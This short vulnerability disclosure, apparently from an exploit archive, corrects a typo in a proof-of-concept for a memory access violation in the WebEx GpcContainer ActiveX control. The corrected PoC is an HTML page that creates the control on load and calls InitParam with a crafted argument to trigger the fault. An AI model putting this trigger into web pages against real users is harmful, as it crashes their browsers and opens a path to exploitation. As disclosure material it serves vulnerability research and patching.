WebEx GPCContainer is susceptible to a memory access violation vulnerability.
c583753bbf32ecc9a32c07cce2bf4c50bde0fe8eacb1194ad21d040d7eb600a6
Typo in the original PoC. It should read as follows:
---------------------
<!--
Written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var obj = new ActiveXObject("GpcContainer.GpcContainer.1");
obj.InitParam("A");
}
</script>
</head>
<body onLoad="JavaScript: return Check();">
</body>
</html>
---------------------
Elazar